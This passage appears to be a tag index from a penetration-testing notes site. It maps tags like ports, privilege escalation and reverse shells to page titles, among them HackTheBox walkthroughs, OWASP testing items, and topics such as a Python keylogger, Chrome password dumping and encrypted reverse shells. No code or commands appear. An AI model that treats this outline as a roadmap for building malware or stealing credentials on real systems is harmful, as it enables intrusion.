                                            ","tags":["tags"]},{"location":"tags/#port-27017","title":"port 27017","text":"
                                            • 27017-27018 mongodb
                                            • Walkthough - A HackTheBox machine - Mongod
                                            ","tags":["tags"]},{"location":"tags/#port-27018","title":"port 27018","text":"
                                            • 27017-27018 mongodb
                                            ","tags":["tags"]},{"location":"tags/#port-3128","title":"port 3128","text":"
                                            • 3128 squid
                                            ","tags":["tags"]},{"location":"tags/#port-3306","title":"port 3306","text":"
                                            • 3306 mariadb mysql
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#port-3389","title":"port 3389","text":"
                                            • 3389 RDP
                                            ","tags":["tags"]},{"location":"tags/#port-445","title":"port 445","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • Tactics - A HackTheBox machine
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#port-465","title":"port 465","text":"
                                            • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#port-5432","title":"port 5432","text":"
                                            • 5432 postgresql
                                            ","tags":["tags"]},{"location":"tags/#port-55007","title":"port 55007","text":"
                                            • 55006-55007 Dovecot pop3
                                            ","tags":["tags"]},{"location":"tags/#port-55008","title":"port 55008","text":"
                                            • 55006-55007 Dovecot pop3
                                            ","tags":["tags"]},{"location":"tags/#port-587","title":"port 587","text":"
                                            • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                                            ","tags":["tags"]},{"location":"tags/#port-5985","title":"port 5985","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            ","tags":["tags"]},{"location":"tags/#port-5986","title":"port 5986","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            ","tags":["tags"]},{"location":"tags/#port-623","title":"port 623","text":"
                                            • 623 - Intelligent Platform Management Interface (IPMI)
                                            • IPMItool
                                            ","tags":["tags"]},{"location":"tags/#port-6379","title":"port 6379","text":"
                                            • 6379 redis
                                            ","tags":["tags"]},{"location":"tags/#port-6653","title":"port 6653","text":"
                                            • 6653 Openflow
                                            ","tags":["tags"]},{"location":"tags/#port-69","title":"port 69","text":"
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#port-8080","title":"port 8080","text":"
                                            • 8080 JBoss AS Instance 6.1.0
                                            ","tags":["tags"]},{"location":"tags/#port-873","title":"port 873","text":"
                                            • 873 rsync
                                            ","tags":["tags"]},{"location":"tags/#port-993","title":"port 993","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-995","title":"port 995","text":"
                                            • Ports 110,143,993, 995 IMAP POP3
                                            ","tags":["tags"]},{"location":"tags/#port-scanner","title":"port scanner","text":"
                                            • Coding a reverse shell that scans ports
                                            ","tags":["tags"]},{"location":"tags/#ports","title":"ports","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#post-exploitation","title":"post exploitation","text":"
                                            • Empire
                                            ","tags":["tags"]},{"location":"tags/#postgresql","title":"postgresql","text":"
                                            • 5432 postgresql
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            ","tags":["tags"]},{"location":"tags/#powershell","title":"powershell","text":"
                                            • Azure Powershell
                                            ","tags":["tags"]},{"location":"tags/#privilege-escalation","title":"privilege escalation","text":"
                                            • Configuration files
                                            • Create a Registry
                                            • Cron jobs - path, wildcards, file overwrite.
                                            • Walkthrough - Included - A HackTheBox machine
                                            • Index for Linux Privilege Escalation
                                            • Index for Windows Privilege Escalation
                                            • Kernel vulnerability exploitation
                                            • linPEAS - A tool to scan Linux system
                                            • Linux exploit suggester
                                            • Linux Privilege Checker
                                            • lxd
                                            • Pass The Hash
                                            • PowerUp.ps1
                                            • Process capabilities - getcap
                                            • SSH keys
                                            • Suid Binaries
                                            • Windows binaries - LOLBAS
                                            • Recently accessed files and executed commands
                                            • winPEAS - Windows Privilege Escalation Awesome Scripts
                                            • Privilege escalation - Weak service file permission
                                            ","tags":["tags"]},{"location":"tags/#privileges-escalation","title":"privileges escalation","text":"
                                            • Dirty COW (Copy On Write)
                                            ","tags":["tags"]},{"location":"tags/#procesmonitor","title":"procesMonitor","text":"
                                            • Information gathering phase - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#process-hacker-tool","title":"process hacker tool","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#proxy","title":"proxy","text":"
                                            • 3128 squid
                                            • Burpsuite
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            ","tags":["tags"]},{"location":"tags/#public-cloud","title":"public cloud","text":"
                                            • Amazon Web Services (AWS) Essentials
                                            • Google Cloud Platform Essentials
                                            ","tags":["tags"]},{"location":"tags/#python","title":"python","text":"
                                            • django pentesting
                                            • Inmunity Debugger
                                            • noip
                                            • pyftpdlib - A ftp server written in python
                                            • pyinstaller
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
                                            • Coding a data exfiltration script for a http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
                                            • Coding a TCP connection and d reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • DNS poisoning
                                            • Dumping saved passwords from Google Chrome
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • Man in the browser attack
                                            • pip
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            • Tunning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#python-pentesting","title":"python pentesting","text":"
                                            • Inmunity Debugger
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
                                            • Coding a data exfiltration script for a http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
                                            • Coding a TCP connection and d reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • DNS poisoning
                                            • Dumping saved passwords from Google Chrome
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • Man in the browser attack
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            • Tunning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#rce","title":"rce","text":"
                                            • SirepRAT - RCE as SYSTEM on Windows IoT Core
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#rdp","title":"rdp","text":"
                                            • 3389 RDP
                                            • rdesktop
                                            • xfreerdp
                                            ","tags":["tags"]},{"location":"tags/#reconnaissance","title":"reconnaissance","text":"
                                            • The ActiveDirectory PowerShell module
                                            • BloodHound
                                            • ctr.sh
                                            • dnscan - A DNS subdomain scanner
                                            • feroxbuster - A web content enumeration tool for not referenced resources
                                            • fping - An improved ping tool
                                            • Github dorks
                                            • Google dorks
                                            • grep
                                            • HTTrack - A tool for mirrowing sites
                                            • masscan - An IP scanner
                                            • Nessus
                                            • netcraft
                                            • netdiscover - A network enumeration tool based on ARP request
                                            • nikto
                                            • nmap - A network exploration and security auditing tool
                                            • OpenVAS
                                            • openVAS Reporting
                                            • p0f
                                            • ping
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            • SharpView
                                            • sublist3r - A subdomain enumerating tool
                                            • tcpdump - A command-line packet analyzer
                                            • The Harvester - A tool for pasive and active reconnaissance
                                            • waybackurls
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            • Test File Permission - OWASP Web Security Testing Guide
                                            • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                                            • Test Cloud Storage - OWASP Web Security Testing Guide
                                            • Testing for Content Security Policy - OWASP Web Security Testing Guide
                                            • Test Path Confusion - OWASP Web Security Testing Guide
                                            • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                                            • Fingerprint Web Server - OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            ","tags":["tags"]},{"location":"tags/#redis","title":"redis","text":"
                                            • 6379 redis
                                            • Walkthrough - A HackTheBox machine - Redeemer
                                            ","tags":["tags"]},{"location":"tags/#reflexil","title":"reflexil","text":"
                                            • Reversing and patching thick clients applications
                                            ","tags":["tags"]},{"location":"tags/#registry","title":"registry","text":"
                                            • Making your binary persistent
                                            ","tags":["tags"]},{"location":"tags/#regshot","title":"regshot","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#relational","title":"relational","text":"
                                            • sqlite
                                            • Virtual environments
                                            ","tags":["tags"]},{"location":"tags/#relational-database","title":"relational database","text":"
                                            • MariaDB
                                            • MySQL
                                            ","tags":["tags"]},{"location":"tags/#reporting","title":"reporting","text":"
                                            • openVAS Reporting
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#resources","title":"resources","text":"
                                            • LOLbins - Living off the land binaries - LOLbas and GTFObins
                                            • Repo for legacy Operating system
                                            • Index of downloads
                                            ","tags":["tags"]},{"location":"tags/#responderpy","title":"responder.py","text":"
                                            • Responder - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#reverse-shell","title":"reverse shell","text":"
                                            • Bank - A HackTheBox machine
                                            • Base - A HackTheBox machine
                                            • Nibbles - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            • pentesmonkey php reverse shell
                                            • Coding a data exfiltration script for a http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
                                            • Coding a TCP connection and d reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            • Tunning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#reverse-shells","title":"reverse-shells","text":"
                                            • Reverse Shells
                                            • Web Shells
                                            ","tags":["tags"]},{"location":"tags/#rpc","title":"rpc","text":"
                                            • Port 111, 32731 - rpc
                                            • Port 43 - whois
                                            ","tags":["tags"]},{"location":"tags/#rsa","title":"rsa","text":"
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            ","tags":["tags"]},{"location":"tags/#rsync","title":"rsync","text":"
                                            • 873 rsync
                                            ","tags":["tags"]},{"location":"tags/#rules","title":"rules","text":"
                                            • Contract - Checklist
                                            • Contractors Agreement - Checklist for Physical Assessments
                                            ","tags":["tags"]},{"location":"tags/#rules-of-engagement","title":"rules of engagement","text":"
                                            • Rules of Engagement - Checklist
                                            ","tags":["tags"]},{"location":"tags/#s3","title":"s3","text":"
                                            • AWS cli
                                            ","tags":["tags"]},{"location":"tags/#samba","title":"samba","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            ","tags":["tags"]},{"location":"tags/#scanner","title":"scanner","text":"
                                            • Nessus
                                            • OpenVAS
                                            • openVAS Reporting
                                            ","tags":["tags"]},{"location":"tags/#scanning","title":"scanning","text":"
                                            • Port 53 - Domain Name Server (DNS)
                                            • ctr.sh
                                            • dnscan - A DNS subdomain scanner
                                            • fping - An improved ping tool
                                            • Github dorks
                                            • Google dorks
                                            • HTTrack - A tool for mirrowing sites
                                            • masscan - An IP scanner
                                            • nmap - A network exploration and security auditing tool
                                            • p0f
                                            • ping
                                            • Powercat - An alternative to netcat coded in PowerShell
                                            • sublist3r - A subdomain enumerating tool
                                            ","tags":["tags"]},{"location":"tags/#screenshot-capturer","title":"screenshot capturer","text":"
                                            • Making a screenshot
                                            ","tags":["tags"]},{"location":"tags/#scripting","title":"scripting","text":"
                                            • Bypassing IPS with handmade XOR Encryption
                                            • Bypassing Next Generation Firewalls
                                            • Coding a data exfiltration script for a http shell
                                            • Coding a low level data exfiltration - TCP connection
                                            • Coding a reverse shell that scans ports
                                            • Coding a reverse shell that searches files
                                            • Coding a TCP connection and d reverse shell
                                            • Coding an http reverse shell
                                            • Coding a DDNS aware shell
                                            • Dumping saved passwords from Google Chrome
                                            • Hickjack the Internet Explorer process to bypass an host-based firewall
                                            • Hijacking Keepass Password Manager
                                            • Including cd command into TCP reverse shell
                                            • Making a screenshot
                                            • Making your binary persistent
                                            • pip
                                            • Privilege escalation - Weak service file permission
                                            • Installing python
                                            • Simple keylogger in python
                                            • Python tools for pentesting
                                            • TCP reverse shell with AES encryption
                                            • TCP reverse shell with hybrid encryption AES + RSA
                                            • TCP reverse shell with RSA encryption
                                            • Tunning the connection attempts
                                            ","tags":["tags"]},{"location":"tags/#serialization-vulnerability","title":"serialization vulnerability","text":"
                                            • Log4j
                                            ","tags":["tags"]},{"location":"tags/#server","title":"server","text":"
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • smbserver - from impacket
                                            • uploadserver
                                            • WebDav- WsgiDAV - A generic and extendable WebDAV server
                                            ","tags":["tags"]},{"location":"tags/#server-enumeration","title":"server enumeration","text":"
                                            • httprint - A web server fingerprinting tool
                                            ","tags":["tags"]},{"location":"tags/#servers","title":"servers","text":"
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • Setting up servers
                                            ","tags":["tags"]},{"location":"tags/#services","title":"services","text":"
                                            • Well-known ports
                                            ","tags":["tags"]},{"location":"tags/#sheet","title":"sheet","text":"
                                            • Pentesting Powerapp
                                            ","tags":["tags"]},{"location":"tags/#shells","title":"shells","text":"
                                            • msfvenom
                                            • Spawn a shell
                                            • Tmux - A terminal multiplexer
                                            ","tags":["tags"]},{"location":"tags/#smb","title":"smb","text":"
                                            • Ports 137, 138, 139, 445 SMB
                                            • Port 2049 - NFS Network File System
                                            • Tactics - A HackTheBox machine
                                            • ntlmrelayx - a module from Impacket
                                            • PsExec - a module from Impacket
                                            • rpcclient - A tool for interacting with smb shares
                                            • smbclient - A tool for interacting with smb shares
                                            • smbmap
                                            ","tags":["tags"]},{"location":"tags/#smb-vulnerability","title":"smb vulnerability","text":"
                                            • Lame - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#snmp_1","title":"snmp","text":"
                                            • braa - SNMP scanner
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • snmpwalk - SNMP scanner
                                            ","tags":["tags"]},{"location":"tags/#soap","title":"soap","text":"
                                            • Pentesting web services
                                            ","tags":["tags"]},{"location":"tags/#sql_1","title":"sql","text":"
                                            • Sequel - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#sql-injection","title":"sql injection","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#sqli","title":"sqli","text":"
                                            • BurpSuite Labs - SQL injection
                                            ","tags":["tags"]},{"location":"tags/#ssrf","title":"ssrf","text":"
                                            • Gopherus
                                            • BurpSuite Labs - Broken access control vulnerabilities
                                            • BurpSuite Labs - Server Side Request Forgery
                                            ","tags":["tags"]},{"location":"tags/#ssti","title":"ssti","text":"
                                            • BurpSuite Labs - Server Side Template Injection
                                            ","tags":["tags"]},{"location":"tags/#strings","title":"strings","text":"
                                            • Attacking thick clients applications - Data storage issues
                                            ","tags":["tags"]},{"location":"tags/#subdomain","title":"subdomain","text":"
                                            • Port 53 - Domain Name Server (DNS)
                                            • ctr.sh
                                            • dnscan - A DNS subdomain scanner
                                            ","tags":["tags"]},{"location":"tags/#subdomains","title":"subdomains","text":"
                                            • sublist3r - A subdomain enumerating tool
                                            ","tags":["tags"]},{"location":"tags/#suid-binaries","title":"suid binaries","text":"
                                            • Bank - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#suid-binary","title":"suid binary","text":"
                                            • Base - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#tcp","title":"tcp","text":"
                                            • p0f
                                            ","tags":["tags"]},{"location":"tags/#tcp-view","title":"tcp view","text":"
                                            • Information gathering phase - Thick client Applications
                                            ","tags":["tags"]},{"location":"tags/#techniques","title":"techniques","text":"
                                            • Pentesting Tomcat
                                            • DNS poisoning
                                            • Man in the browser attack
                                            ","tags":["tags"]},{"location":"tags/#telnet","title":"telnet","text":"
                                            • 23 telnet
                                            ","tags":["tags"]},{"location":"tags/#terminal","title":"terminal","text":"
                                            • msfvenom
                                            • Spawn a shell
                                            • Tmux - A terminal multiplexer
                                            ","tags":["tags"]},{"location":"tags/#tftp","title":"tftp","text":"
                                            • 21 ftp
                                            • Walkthrough - Included - A HackTheBox machine
                                            ","tags":["tags"]},{"location":"tags/#thick-applications","title":"thick applications","text":"
                                            • CFF explorer
                                            • CFF explorer
                                            • mitm_relay Suite
                                            • SysInternals Suite
                                            ","tags":["tags"]},{"location":"tags/#thick-client","title":"thick client","text":"
                                            • Window Detective - A tool to view windows properties in the system
                                            • winspy - A tool to view windows properties in the system
                                            ","tags":["tags"]},{"location":"tags/#thick-client-application","title":"thick client application","text":"
                                            • Process Hacker tool
                                            ","tags":["tags"]},{"location":"tags/#thick-client-applications","title":"thick client applications","text":"
                                            • Pentesting Thick client Applications - Introduction
                                            • Attacking thick clients applications - Data storage issues
                                            • Basic Lab Setup - Thick client Applications
                                            • Common vulnerabilities
                                            • First challenge - Enabling a button - Thick client Applications
                                            • Information gathering phase - Thick client Applications
                                            • Reversing and patching thick clients applications
                                            • Traffic analysis - Thick client Applications
                                            • Thick client Applications Pentesting Checklist
                                            • Tools for pentesting thick client applications
                                            ","tags":["tags"]},{"location":"tags/#thick-client-applications-pentesting","title":"thick client applications pentesting","text":"
                                            • Pentesting Thick client Applications - Introduction
                                            • Attacking thick clients applications - Data storage issues
                                            • Basic Lab Setup - Thick client Applications
                                            • Common vulnerabilities
                                            • First challenge - Enabling a button - Thick client Applications
                                            • Information gathering phase - Thick client Applications
                                            • Reversing and patching thick clients applications
                                            • Traffic analysis - Thick client Applications
                                            • Thick client Applications Pentesting Checklist
                                            • Tools for pentesting thick client applications
                                            ","tags":["tags"]},{"location":"tags/#tool","title":"tool","text":"
                                            • dirb - A web content enumeration tool
                                            • feroxbuster - A web content enumeration tool for not referenced resources
                                            • Markdown
                                            • postfix - A SMTP server
                                            • xsltproc
                                            ","tags":["tags"]},{"location":"tags/#tools","title":"toolS","text":"
                                            • Network traffic capture tools
                                            ","tags":["tags"]},{"location":"tags/#tools_1","title":"tools","text":"
                                            • Port 5985, 5986 - WinRM - Windows Remote Management
                                            • The ActiveDirectory PowerShell module
                                            • Amass
                                            • apktool
                                            • arjun
                                            • arpspoof from dniff
                                            • BeEF - The browser exploitation framework project
                                            • BloodHound
                                            • braa - SNMP scanner
                                            • Pentesting browsers
                                            • Burpsuite
                                            • cewl - A custom dictionary generator
                                            • Tools for cloning a site
                                            • crunch - A dictionary generator
                                            • ctr.sh
                                            • CUPP - Common User Password Profiler
                                            • curl
                                            • darkarmour
                                            • Dictionaries or wordlists resources
                                            • dig axfr
                                            • dnsenum - A tool to enumerate DNS
                                            • DNSRecon - DNS Enumeration and Scanning Tool
                                            • evil-winrm
                                            • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                                            • figlet
                                            • Inmunity Debugger
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • mythic
                                            • nishang
                                            • nslookup
                                            • odat - Oracle Database Attacking Tool
                                            • onesixtyone - Fast and simple SNMP scanner
                                            • Phpggc - A tool for PHP deserialization
                                            • PowerUp.ps1
                                            • rdesktop
                                            • Responder.py - A SMB server to listen to NTLM hashes
                                            • rpcclient - A tool for interacting with smb shares
                                            • Remote Server Administration Tools (RSAT)
                                            • SharpView
                                            • smbclient - A tool for interacting with smb shares
                                            • smbmap
                                            • snmpwalk - SNMP scanner
                                            • sqlplus - To connect and manage the Oracle RDBMS
                                            • sshpass - A program to pass passwords in the command line to ssh
                                            • The Harvester - A tool for pasive and active reconnaissance
                                            • vnstat - Monitoring network impact
                                            • waybackurls
                                            • xfreerdp
                                            • Ysoserial - A tool for Java deserialization
                                            • Tools for pentesting thick client applications
                                            • Creating malware and custom payloads
                                            ","tags":["tags"]},{"location":"tags/#traffic-tool","title":"traffic tool","text":"
                                            • CFF explorer
                                            ","tags":["tags"]},{"location":"tags/#visual-code-grepper","title":"visual code grepper","text":"
                                            • Common vulnerabilities
                                            ","tags":["tags"]},{"location":"tags/#vpn","title":"vpn","text":"
                                            • VPN notes
                                            ","tags":["tags"]},{"location":"tags/#vsftpd","title":"vsFTPd","text":"
                                            • 21 ftp
                                            ","tags":["tags"]},{"location":"tags/#vulnerability","title":"vulnerability","text":"
                                            • dirb - A web content enumeration tool
                                            ","tags":["tags"]},{"location":"tags/#vulnerability-assessment","title":"vulnerability assessment","text":"
                                            • Nessus
                                            • OpenVAS
                                            • openVAS Reporting
                                            ","tags":["tags"]},{"location":"tags/#walkthrough","title":"walkthrough","text":"
                                            • Appointment - A HackTheBox machine
                                            • Archetype - A HackTheBox machine
                                            • Bank - A HackTheBox machine
                                            • Base - A HackTheBox machine
                                            • Crocodile - A HackTheBox machine
                                            • Explosion - A HackTheBox machine
                                            • Walkthrough - Friendzone - A HackTheBox machine
                                            • Walkthrough - A HackTheBox machine - Funnel
                                            • Ignition - A HackTheBox machine
                                            • Walkthrough - Included - A HackTheBox machine
                                            • Lame - A HackTheBox machine
                                            • Markup - A HackTheBox machine
                                            • Walkthrough - Metatwo - A HackTheBox machine
                                            • Walkthough - A HackTheBox machine - Mongod
                                            • Nibbles - A HackTheBox machine
                                            • Nunchucks - A HackTheBox machine
                                            • Walkthrough - Omni - A HackTheBox machine
                                            • Oppsie - A HackTheBox machine
                                            • Pennyworth - A HackTheBox machine
                                            • Walkthrough - Photobomb - A HackTheBox machine
                                            • Popcorn - A HackTheBox machine
                                            • Walkthrough - A HackTheBox machine - Redeemer
                                            • Responder - A HackTheBox machine
                                            • Sequel - A HackTheBox machine
                                            • Walkthrough - Support - A HackTheBox machine
                                            • Tactics - A HackTheBox machine
                                            • Walkthrough - Trick - A HackTheBox machine
                                            • Walkthrough - Unified - A HackTheBox machine
                                            • Walkthrough - Usage - A HackTheBox machine
                                            • Vaccine - A HackThebBox machine
                                            • Walkthrough - GoldenEye 1, a vulnhub machine
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • Index of walkthroughs
                                            ","tags":["tags"]},{"location":"tags/#web","title":"web","text":"
                                            • Gopherus
                                            • Information gathering
                                            • netcraft
                                            • Reverse Shells
                                            • Weevely - A PHP webshell backdoor generator
                                            • OWASP Web Security Testing Guide
                                            • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                                            • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                                            • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                                            • Identify Application Entry Points - OWASP Web Security Testing Guide
                                            • Map Execution Paths through applications - OWASP Web Security Testing Guide
                                            • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                                            • Fingerprint Web Applications - OWASP Web Security Testing Guide
                                            • Map Application architecture - OWASP Web Security Testing Guide
                                            • Web Exploitation Guide
                                            • Arbitrary file upload
                                            • CSRF attack - Cross Site Request Forgery
                                            • Insecure deserialization
                                            • Json Web Token attacks
                                            • NoSQL injection
                                            ","tags":["tags"]},{"location":"tags/#web-enumeration","title":"web enumeration","text":"
                                            • feroxbuster - A web content enumeration tool for not referenced resources
                                            ","tags":["tags"]},{"location":"tags/#web-pentesting","title":"web pentesting","text":"
                                            • 22 ssh
                                            • 3128 squid
                                            • Aquatone - Automatize web scanner in large subdomain lists
                                            • BeEF - The browser exploitation framework project
                                            • Bind Shells
                                            • Burpsuite
                                            • cewl - A custom dictionary generator
                                            • Tools for cloning a site
                                            • crunch - A dictionary generator
                                            • CUPP - Common User Password Profiler
                                            • Dictionaries or wordlists resources
                                            • django pentesting
                                            • eWPT Preparation
                                            • EyeWitness
                                            • ffuf - A fast web fuzzer written in Go
                                            • Responder - A HackTheBox machine
                                            • Interactsh - An alternative to BurpSuite Collaborator
                                            • knockpy - A subdomain scanner
                                            • Laudanum - Injectable Web Exploit Code
                                            • Lazagne
                                            • Log4j
                                            • moodlescan
                                            • nikto
                                            • searchsploit
                                            • sslyze - A tool for scanning certificates
                                            • Pentesting Tomcat
                                            • veil - A backdoor generator
                                            • Vulnhub Raven 1
                                            • Vulnhub Raven 2
                                            • w3af
                                            • WafW00f - A firewall scanner
                                            • wfuzz
                                            • whatweb - A web scanner
                                            • wpscan - Wordpress Security Scanner
                                            • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                            • Testing GraphQL - OWASP Web Security Testing Guide
                                            • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                                            • Testing for Default Credentials - OWASP Web Security Testing Guide
                                            • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                                            • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                                            • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                                            • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                                            • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                                            • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                                            • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                                            • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                                            • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                                            • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                                            • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                                            • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                                            • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                                            • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                                            • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                                            • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                                            • Test Integrity Checks - OWASP Web Security Testing Guide
                                            • Test for Process Timing - OWASP Web Security Testing Guide
                                            • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                                            • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                                            • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                                            • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                                            • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                                            • Test Payment Functionality - OWASP Web Security Testing Guide
                                            • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                                            • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                                            • Testing for HTML Injection - OWASP Web Security Testing Guide
                                            • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                                            • Testing for CSS Injection - OWASP Web Security Testing Guide
                                            • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                                            • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                                            • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                                            • Testing for Clickjackingx - OWASP Web Security Testing Guide
                                            • Testing WebSockets - OWASP Web Security Testing Guide
                                            • Testing Web Messaging - OWASP Web Security Testing Guide
                                            • Testing Browser Storage - OWASP Web Security Testing Guide
                                            • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                                            • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                                            • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                                            • Test Application Platform Configuration - OWASP Web Security Testing Guide
                                            • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                                            • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                                            • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                                            • Test HTTP Methods - OWASP Web Security Testing Guide
                                            • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                                            • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                                            • Test File Permission - OWASP Web Security Testing Guide
